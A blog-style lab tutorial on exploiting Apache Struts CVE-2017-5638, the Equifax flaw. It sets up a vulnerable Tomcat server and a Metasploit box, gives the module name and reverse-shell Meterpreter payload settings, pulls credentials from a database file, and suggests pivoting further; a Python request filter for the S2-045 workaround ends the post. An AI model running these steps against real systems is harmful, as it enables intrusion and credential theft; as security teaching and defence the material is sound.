10/7/17

Welcome back to another tutorial, Struts masters! Today we will be setting up two VPS servers to exploit the Apache Struts vulnerability made famous by the Equifax breach ;) We will be exploiting a Tomcat web server located in New York and firing the exploit from Singapore, sweeeeeeeeeeeeeet!

Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. The WebWork framework spun off from Apache Struts aiming to offer enhancements and refinements while retaining the same general architecture of the original Struts framework. In December 2005, it was announced that WebWork 2.2 was adopted as Apache Struts 2, which reached its first full release in February 2007.

About CVE-2017-5638:
Security researchers have discovered a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. It is triggered through Object Graph Navigation Language (OGNL) expressions and is being actively exploited in the wild.

About the exploit: This vulnerability can be triggered when an attacker sends a crafted HTTP file-upload request to an Apache Struts application that uses the Jakarta Multipart parser for its file upload functionality.

We will start by setting up two Ubuntu servers on our VPS provider: one with Tomcat for the website, and one with Metasploit as our exploit box.

1) For the Tomcat server in New York, we will be using Ubuntu 16.04 x64 with 1 CPU and 512 MB of RAM.

We are going to run the following commands to get this going.

sudo apt-get install tomcat7
sudo apt-get install tomcat7-docs tomcat7-admin tomcat7-examples
sudo apt-get install ant git
sudo nano /etc/tomcat7/tomcat-users.xml
# Add this line to tomcat-users.xml
<user username="usernameyouwant" password="passwordyouwant" roles="manager-gui,admin-gui"/>
sudo service tomcat7 start

Next, we will be setting up our exploit server located in Singapore. We will use Ubuntu 14.04 x64 with 1 CPU and 1 GB of RAM; anything less than 1 GB of RAM will give you errors starting Metasploit. We can run the following commands to get Metasploit up and running.

apt install traceroute
apt-get install software-properties-common
sudo apt-add-repository ppa:brightbox/ruby-ng
sudo apt-get update
sudo apt-get install ruby2.4 ruby2.4-dev
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
bash msfinstall
# then run msfconsole

Alright, now that both servers are running, you should see the default Tomcat start page when you open http://yourvpsip:8080 in your web browser.

If you successfully created your login account, you can manage your .war files and apps under
http://yourvpsip:8080/manager/html


Once in this area of the site, we are going to install a vulnerable app for this exploit POC. Download the .war file from:
https://github.com/nixawk/labs/raw/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war

A .war file is the extension of a file that packages a web application directory hierarchy in ZIP format and is short for Web Archive. Java web applications are usually packaged as WAR files for deployment. These files can be created on the command line or with an IDE like Eclipse.
After downloading this file, upload/deploy it to the web server through the manager page.


You can then follow the URL to the vulnerable app and take a look at its default layout and the path we will be targeting.


Now that we have set up our two servers successfully, we can start exploiting the vulnerable web server. Log in to the exploit box and run msfconsole.

We will be using the exploit module located at
/multi/http/struts2_content_type_ognl

We will then need to set the payload to return a shell to our server. We will use a reverse TCP Meterpreter payload:
set PAYLOAD linux/x64/meterpreter/reverse_tcp
We will also need to set RHOST (the web server IP) and LHOST (the Metasploit box IP).

And lastly, set the target URI:
set TARGETURI /struts2_2.3.15.1-showcase/showcase.action


Now we're ready to exploit! Fire it up! AND......... EXPLOIT!

Once the exploitation is successful we can confirm we are connected to the server in New York! Now we can run any assortment of Meterpreter commands and dig around for information. Notice in the screenshot below that we can see some text files (made for this POC), which we can download to our exploit box.


I'd say this databse.sql file looks like it might have some interesting information; let's download it and view the contents!


Boy oh boy, it looks like we have some usernames and passwords! This box is definitely PWNED by this point. We can even change paths to other parts of the file system and download or upload files. Meterpreter has a whole set of commands and functions/scripts you can use. The sky's the limit once you have access to the server: you can scan other devices for SMB vulnerabilities, pivot deeper into the network, or whatever else you can think of!

You can head on over to https://cwiki.apache.org/confluence/display/WW/S2-045 for more information on how to patch this CVE to secure your systems.
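Besides upgrading, the S2-045 advisory linked above describes an interim workaround: put a filter in front of the application that throws away any request whose Content-Type is not a well-formed multipart/form-data value. The Python below is an added example, not code from this post or from Apache, of that kind of Content-Type triage run over a few constructed requests; the regex, the marker list, the verdict names and the sample requests are my own assumptions.

```python
import re
from typing import List, Optional, Tuple

# Strict grammar for the only Content-Type the Jakarta multipart parser should see:
# "multipart/form-data" plus an optional RFC 2046 boundary (1-70 boundary chars).
MULTIPART_OK = re.compile(
    r"^multipart/form-data(?:\s*;\s*boundary=\"?[\w'()+,\-./:=? ]{1,70}\"?)?\s*$",
    re.IGNORECASE,
)
# OGNL expression markers; no legitimate Content-Type value contains any of them.
OGNL_MARKERS = ("%{", "${", "#", "ognl")

def classify_content_type(value: str) -> str:
    """'reject': OGNL markers or a multipart value the parser cannot parse (the
    failed-parse error path is what S2-045 abuses); 'multipart-ok': well-formed
    multipart/form-data; 'passthrough': other types never reach the multipart parser."""
    v = value.strip()
    low = v.lower()
    if any(marker in low for marker in OGNL_MARKERS):
        return "reject"
    if low.startswith("multipart/form-data"):
        return "multipart-ok" if MULTIPART_OK.match(v) else "reject"
    return "passthrough"

def content_type_of(raw_request: str) -> Optional[str]:
    """Extract the Content-Type header value from the head of a raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, val = line.partition(":")
        if sep and name.strip().lower() == "content-type":
            return val.strip()
    return None

def triage(raw_requests: List[str]) -> List[Tuple[Optional[str], str]]:
    """Classify each raw request by its Content-Type (e.g. replayed from a WAF log or pcap)."""
    return [(ct, classify_content_type(ct or ""))
            for ct in (content_type_of(r) for r in raw_requests)]

# Constructed sample requests (not captured traffic): a normal upload, an OGNL-looking
# Content-Type, a malformed multipart header, and an ordinary form post.
def _req(ct_line: str) -> str:
    return ("POST /struts2_2.3.15.1-showcase/showcase.action HTTP/1.1\r\n"
            "Host: vps.example\r\n" + ct_line + "\r\n\r\n")

SAMPLE_REQUESTS = [
    _req("Content-Type: multipart/form-data; boundary=----constructedBoundary42"),
    _req("Content-Type: %{#constructed_ognl_marker}"),
    _req("Content-Type: multipart/form-data; boundary="),
    _req("Content-Type: application/x-www-form-urlencoded"),
]
```

The third sample is the subtle case: it carries no OGNL at all, but a multipart header the parser cannot parse is exactly what sends Struts down the vulnerable error path, so a filter should reject it too.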

Well there you have it folks, exploiting CVE-2017-5638 from the other side of the world!!!!! I hope you enjoyed this real-world scenario exploit tutorial!